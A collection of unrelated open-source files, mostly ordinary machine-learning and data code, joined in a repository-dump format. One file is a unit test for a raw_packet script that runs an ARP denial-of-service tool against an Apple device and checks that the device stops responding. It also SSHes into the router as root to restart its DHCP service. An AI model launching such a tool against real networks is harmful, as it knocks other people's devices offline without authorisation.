"tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": "03f542afa2d70224d594b2cca33b99977a5c0e41b1a8d03471ab3cf62ea3c4b3",
"tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": "2172cca68a8b7722d281174a74c4f112d0f52fc71710d7d605f401731c783fc9",
"tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": "55c694262c4d44b342e08eb3ef2082eeb9e9deeb3cb445e4776419bb9fa7dc21",
"tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": "95163831d9076bb5e5b21790933dee9535a3607ba35bd6ae425374a45ecb1ba6",
"tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": "305c80e28227b25fdd0cc24726da4cf038380b4326e25c6518ffe23051a25ac0",
"tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": "f8e5059a0c9f8c026cfb2613cddef6562f8cdbd5954580282e2afa41d2f86a8c",
"9798433/?format=tif": "7db49ff9fc3f6022ae334cf019e94ef4450f7d4cf0d71783e0f6ea82965d3a52",
"9798554/?format=tif": "8a4318ac713b4cf50c3314760da41ab7653e10e90531ecd0c787f1386857a4ef",
}
APERIO_REPO_URL = "http://openslide.cs.cmu.edu/download/openslide-testdata/Aperio"
TCGA_REPO_URL = "https://api.gdc.cancer.gov/data"
IDR_REPO_URL = "https://idr.openmicroscopy.org/webclient/render_image_download"
registry_urls = {
"histolab/broken.svs": "https://raw.githubusercontent.com/histolab/histolab/master/tests/fixtures/svs-images/broken.svs",
"histolab/kidney.png": "https://user-images.githubusercontent.com/4196091/100275351-132cc880-2f60-11eb-8cc8-7a3bf3723260.png",
"aperio/JP2K-33003-1.svs": f"{APERIO_REPO_URL}/JP2K-33003-1.svs",
"aperio/JP2K-33003-2.svs": f"{APERIO_REPO_URL}/JP2K-33003-2.svs",
"tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": f"{TCGA_REPO_URL}/9c960533-2e58-4e54-97b2-8454dfb4b8c8",
"tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": f"{TCGA_REPO_URL}/da36d3aa-9b19-492a-af4f-cc028a926d96",
"tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": f"{TCGA_REPO_URL}/f8b4cee6-9149-45b4-ae53-82b0547e1e34",
"tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": f"{TCGA_REPO_URL}/31e248bf-ee24-4d18-bccb-47046fccb461",
"tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": f"{TCGA_REPO_URL}/6b725022-f1d5-4672-8c6c-de8140345210",
"tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": f"{TCGA_REPO_URL}/b777ec99-2811-4aa4-9568-13f68e380c86",
"9798433/?format=tif": f"{IDR_REPO_URL}/9798433/?format=tif",
"9798554/?format=tif": f"{IDR_REPO_URL}/9798554/?format=tif",
}
legacy_registry = {
("data/" + filename): registry["data/" + filename] for filename in legacy_datasets
}
|
semtorch/models/archs/backbones/__init__.py | WaterKnight1998/SemTorch | 145 | 11096185 | from .build import BACKBONE_REGISTRY, get_segmentation_backbone
from .xception import *
from .mobilenet import *
from .resnet import * |
tests/test_vectorizer.py | vj1494/kindred | 141 | 11096212 | import numpy as np
import kindred
import os
import json
from kindred.datageneration import generateData,generateTestData
def check(valueName,value):
write = False
scriptDir = os.path.dirname(__file__)
jsonPath = os.path.join(scriptDir,'data','vectorizer','expected.json')
if os.path.isfile(jsonPath):
with open(jsonPath) as f:
data = json.load(f)
else:
data = {}
if write:
data[valueName] = value
with open(jsonPath,'w') as f:
json.dump(data,f,indent=2,sort_keys=True)
assert valueName in data
assert data[valueName] == value
def test_simpleVectorizer_binary():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer>. <drug id="3">Aspirin</drug> is the main cause of <disease id="4">boneitis</disease> . <relation type="treats" subj="1" obj="2" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 2): 1.0, (0, 3): 1.0, (1, 0): 1.0, (1, 5): 1.0, (2, 2): 1.0, (2, 4): 1.0, (3, 1): 1.0, (3, 5): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_binary',namedCols)
def test_simpleVectorizer_triple():
text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer> which targets <gene id="3">EGFR</gene>. <relation type="druginfo" drug="1" disease="2" gene="3" />'
corpus = kindred.Corpus(text,loadFromSimpleTag=True)
parser = kindred.Parser()
parser.parse(corpus)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations = candidateBuilder.build(corpus)
# We'll just get the vectors for the entityTypes
vectorizer = kindred.Vectorizer(entityCount=3,featureChoice=["entityTypes"])
vectors = vectorizer.fit_transform(candidateRelations)
vectorsCSR = vectors.tocsr()
rows,cols = vectors.nonzero()
expected = {(0, 1): 1.0, (0, 3): 1.0, (0, 8): 1.0, (1, 1): 1.0, (1, 5): 1.0, (1, 6): 1.0, (2, 0): 1.0, (2, 4): 1.0, (2, 8): 1.0, (3, 0): 1.0, (3, 5): 1.0, (3, 7): 1.0, (4, 2): 1.0, (4, 4): 1.0, (4, 6): 1.0, (5, 2): 1.0, (5, 3): 1.0, (5, 7): 1.0}
namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) }
check('test_simpleVectorizer_triple',namedCols)
def test_vectorizer_defaults():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer()
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_2',namedCols2)
def test_vectorizer_entityTypes():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_1',namedCols1)
colmeans2 = np.sum(matrix2,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_2',namedCols2)
def test_vectorizer_bigrams():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_2',namedCols2)
def test_vectorizer_dependencyPathEdges():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_2',namedCols2)
def test_vectorizer_entityTypes_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["entityTypes"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_entityTypes_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_entityTypes_noTFIDF_2',namedCols2)
def test_vectorizer_unigramsBetweenEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["unigramsBetweenEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_unigramsBetweenEntities_noTFIDF_2',namedCols2)
def test_vectorizer_bigrams_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["bigrams"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_bigrams_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_bigrams_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdges_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdges"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdges_noTFIDF_2',namedCols2)
def test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF():
corpus1, _ = generateTestData(positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder()
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
chosenFeatures = ["dependencyPathEdgesNearEntities"]
vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_2',namedCols2)
def test_vectorizer_defaults_triple():
corpus1, _ = generateTestData(entityCount=3,positiveCount=5,negativeCount=5)
corpus2, _ = generateTestData(entityCount=3,positiveCount=10,negativeCount=10)
parser = kindred.Parser()
parser.parse(corpus1)
parser.parse(corpus2)
candidateBuilder = kindred.CandidateBuilder(entityCount=3)
candidateRelations1 = candidateBuilder.build(corpus1)
candidateRelations2 = candidateBuilder.build(corpus2)
vectorizer = kindred.Vectorizer(entityCount=3)
matrix1 = vectorizer.fit_transform(candidateRelations1)
matrix2 = vectorizer.transform(candidateRelations2)
colnames = vectorizer.getFeatureNames()
# As a quick check, we'll confirm that the column means are as expected
colmeans1 = np.sum(matrix1,axis=0).tolist()[0]
namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) }
check('test_vectorizer_defaults_triple_1',namedCols1)
colmeans2 = np.sum(matrix1,axis=0).tolist()[0]
namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) }
check('test_vectorizer_defaults_triple_2',namedCols2)
if __name__ == '__main__':
test_vectorizer_defaults_triple()
|
blackstone/displacy_palette.py | DeNeutoy/Blackstone | 541 | 11096216 | ner_displacy_palette = {
"CASENAME": "#da3650",
"CITATION": "#67328b",
"JUDGE": "#00a594",
"COURT": "#fcd548",
"PROVISION": "#007bac",
"INSTRUMENT": "#6c63a5",
"CONCEPT": "#df5a35",
}
ner_displacy_options = {
"ents": [
"CASENAME",
"CITATION",
"JUDGE",
"COURT",
"PROVISION",
"INSTRUMENT",
"CONCEPT",
],
"colors": ner_displacy_palette,
}
dep_displacy_options = {
"compact": False,
"bg": "linear-gradient(90deg, #bdc3c7, #2c3e50)",
"color": "white",
"font": "Gotham",
}
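# Editor-added usage sketch (not part of the original Blackstone source): the
# option dicts above are intended to be passed to spaCy's displacy visualiser.
# The sentence, entity span and offsets below are invented for illustration,
# and manual=True is used so no trained pipeline needs to be installed.
if __name__ == "__main__":
    from spacy import displacy

    manual_doc = [
        {
            "text": "Section 3 of the Human Rights Act 1998 was considered.",
            "ents": [{"start": 0, "end": 9, "label": "PROVISION"}],
            "title": None,
        }
    ]
    # Render with the NER palette defined above; returns an HTML string.
    print(displacy.render(manual_doc, style="ent", options=ner_displacy_options, manual=True))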
|
tests/layer_tests/onnx_tests/test_argmax.py | ryanloney/openvino-1 | 1,127 | 11096235 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
import pytest
from common.layer_test_class import check_ir_version
from common.onnx_layer_test_class import OnnxRuntimeLayerTest
from unit_tests.utils.graph import build_graph
class TestArgMax(OnnxRuntimeLayerTest):
def create_net(self, shape, axis, keepdims, ir_version):
"""
ONNX net IR net
Input->ArgMax->Output => Input->TopK
"""
#
# Create ONNX model
#
import onnx
from onnx import helper
from onnx import TensorProto
output_shape = shape.copy()
output_shape[axis if axis is not None else 0] = 1
output_shape_squeeze = output_shape.copy()
if keepdims == 0:
output_shape_squeeze.remove(1)
input = helper.make_tensor_value_info('input', TensorProto.FLOAT, shape)
output = helper.make_tensor_value_info('output', TensorProto.INT64, output_shape_squeeze)
const = np.random.randint(-10, 10, output_shape_squeeze).astype(np.int64)
args = dict()
if axis is not None:
args['axis'] = axis
else:
axis = 0
if keepdims is not None:
args['keepdims'] = keepdims
node_def = onnx.helper.make_node(
'ArgMax',
inputs=['input'],
outputs=['argmax' if keepdims is None or keepdims == 1 else 'output'],
**args
)
edges = [node_def]
if keepdims is None or keepdims == 1:
node_flatten_def = onnx.helper.make_node(
'Flatten',
inputs=['argmax'],
outputs=['output']
)
edges.append(node_flatten_def)
# Create the graph (GraphProto)
graph_def = helper.make_graph(
edges,
'test_model',
[input],
[output],
)
# Create the model (ModelProto)
onnx_net = helper.make_model(graph_def, producer_name='test_model')
#
# Create reference IR net
#
ref_net = None
if check_ir_version(10, None, ir_version):
nodes_attributes = {
'input': {'kind': 'op', 'type': 'Parameter'},
'input_data': {'shape': shape, 'kind': 'data'},
'const_indata': {'shape': [1], 'kind': 'data'},
'const': {'kind': 'op', 'type': 'Const'},
'const_data': {'shape': [], 'kind': 'data'}, # TODO shape [] or [1] ??
'node': {'kind': 'op', 'type': 'TopK'},
'node_data': {'shape': output_shape, 'kind': 'data'},
'indices_data': {'shape': output_shape, 'kind': 'data'},
'result1': {'kind': 'op', 'type': 'Result'},
'result2': {'kind': 'op', 'type': 'Result'}
}
edges = [('input', 'input_data'),
('const_indata', 'const'),
('const', 'const_data'),
('input_data', 'node'),
('const_data', 'node'),
('node', 'node_data'),
('node', 'indices_data'),
('node_data', 'result1')]
if keepdims == 0:
nodes_attributes.update({'squeeze_const_indata': {'shape': [1], 'kind': 'data'},
'squeeze_const': {'kind': 'op', 'type': 'Const'},
'squeeze_const_data': {'shape': [1], 'kind': 'data'},
'squeeze': {'kind': 'op', 'type': 'Squeeze'},
'squeeze_data': {'shape': output_shape_squeeze,
'kind': 'data'}
})
edges.extend([('squeeze_const_indata', 'squeeze_const'),
('squeeze_const', 'squeeze_const_data'),
('indices_data', 'squeeze'),
('squeeze_const_data', 'squeeze'),
('squeeze', 'squeeze_data'),
('squeeze_data', 'result2')])
else:
nodes_attributes.update(
{'flatten_const_indata': {'kind': 'data', 'value': [0, -1]},
'flatten_const': {'kind': 'op', 'type': 'Const'},
'flatten_const_data': {'shape': [2], 'kind': 'data'},
'flatten': {'kind': 'op', 'type': 'Reshape'},
'flatten_data': {
'shape': [output_shape_squeeze[0], np.prod(output_shape_squeeze[1:])],
'kind': 'data'}
})
edges.extend([('indices_data', 'flatten'),
('flatten_const_indata', 'flatten_const'),
('flatten_const', 'flatten_const_data'),
('flatten_const_data', 'flatten'),
('flatten', 'flatten_data'),
('flatten_data', 'result2')])
ref_net = build_graph(nodes_attributes, edges)
return onnx_net, ref_net
test_data = [
dict(shape=[10, 12], axis=None),
dict(shape=[10, 12], axis=1),
dict(shape=[8, 10, 12], axis=None),
dict(shape=[8, 10, 12], axis=1),
dict(shape=[8, 10, 12], axis=2),
dict(shape=[6, 8, 10, 12], axis=None),
dict(shape=[6, 8, 10, 12], axis=1),
dict(shape=[6, 8, 10, 12], axis=2),
dict(shape=[6, 8, 10, 12], axis=3),
dict(shape=[4, 6, 8, 10, 12], axis=None),
dict(shape=[4, 6, 8, 10, 12], axis=1),
dict(shape=[4, 6, 8, 10, 12], axis=2),
dict(shape=[4, 6, 8, 10, 12], axis=3),
dict(shape=[4, 6, 8, 10, 12], axis=4)]
@pytest.mark.parametrize("params", test_data)
@pytest.mark.parametrize("keepdims", [None, 0])
@pytest.mark.nightly
def test_argmax(self, params, keepdims, ie_device, precision, ir_version, temp_dir, api_2):
self._test(*self.create_net(**params, ir_version=ir_version, keepdims=keepdims),
ie_device, precision, ir_version, temp_dir=temp_dir, api_2=api_2)
|
metadrive/component/road_network/__init__.py | liuzuxin/metadrive | 125 | 11096241 | from metadrive.component.road_network.road import Road, Route
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
|
raw_packet/Tests/Unit_tests/Scripts/Apple/test_apple_arp_dos.py | Vladimir-Ivanov-Git/raw_packet | 146 | 11096249 | # region Description
"""
test_apple_arp_dos.py: Unit tests for Raw-packet script: apple_arp_dos.py
Author: <NAME>
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from sys import path
from os.path import dirname, abspath
from os import system, kill
from signal import SIGTERM
from time import sleep, time
from subprocess import Popen, run, PIPE
import unittest
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - ScriptAppleArpDosTest
class ScriptAppleArpDosTest(unittest.TestCase):
# region Properties
root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
path.append(root_path)
from raw_packet.Utils.base import Base
from raw_packet.Tests.Unit_tests.variables import Variables
base: Base = Base()
# endregion
def kill_test_process(self) -> None:
while self.base.get_process_pid('/apple_arp_dos.py') != -1:
kill(self.base.get_process_pid('/apple_arp_dos.py'), SIGTERM)
sleep(0.1)
@staticmethod
def restart_dhcp_server_over_ssh() -> None:
run(['ssh ' + ScriptAppleArpDosTest.Variables.router_root_username + '@' +
ScriptAppleArpDosTest.Variables.router_ipv4_address + ' "/etc/init.d/dnsmasq restart"'], shell=True)
def check_apple_device_connected(self) -> None:
self.kill_test_process()
sleep(5)
response: int = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
if response == 0:
return None
else:
self.restart_dhcp_server_over_ssh()
while response != 0:
response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
def test01_main_arp_scan(self):
self.check_apple_device_connected()
apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface], shell=True, stdout=PIPE)
find_target: bool = False
start_time = time()
for output_line in apple_arp_dos.stdout:
output_line: str = output_line.decode('utf-8')
print(output_line[:-1])
if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line:
find_target = True
break
if int(time() - start_time) > 10:
self.kill_test_process()
break
self.assertTrue(find_target)
def test02_main_nmap_scan(self):
self.check_apple_device_connected()
apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -n'], shell=True, stdout=PIPE)
find_target: bool = False
start_time = time()
for output_line in apple_arp_dos.stdout:
output_line: str = output_line.decode('utf-8')
print(output_line[:-1])
if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line:
find_target = True
break
if int(time() - start_time) > 120:
self.kill_test_process()
break
self.assertTrue(find_target)
def test03_main_bad_interface(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.bad_network_interface], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_network_interface, apple_arp_dos_output)
def test04_main_bad_target_ip(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' +
ScriptAppleArpDosTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_ipv4_address, apple_arp_dos_output)
def test05_main_bad_target_mac(self):
apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' +
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' +
ScriptAppleArpDosTest.Variables.apple_device_ipv4_address + ' -m ' +
ScriptAppleArpDosTest.Variables.bad_mac_address], shell=True, stdout=PIPE)
apple_arp_dos_output: bytes = apple_arp_dos.stdout
apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8')
print(apple_arp_dos_output)
self.assertIn(ScriptAppleArpDosTest.Variables.bad_mac_address, apple_arp_dos_output)
def test06_main(self):
self.check_apple_device_connected()
command: str = 'python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + \
ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' + \
ScriptAppleArpDosTest.Variables.apple_device_ipv4_address
Popen(command, shell=True)
sleep(10)
response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address)
self.assertNotEqual(response, 0)
self.check_apple_device_connected()
# endregion
|
nuplan/common/utils/split_state.py | motional/nuplan-devkit | 128 | 11096250 | from dataclasses import dataclass
from typing import Any, List
@dataclass
class SplitState:
"""Dataclass representing a state split between fixed states, linear states and angular states."""
linear_states: List[Any] # Variable states
angular_states: List[float] # Variable states, representing angles, with 2pi period
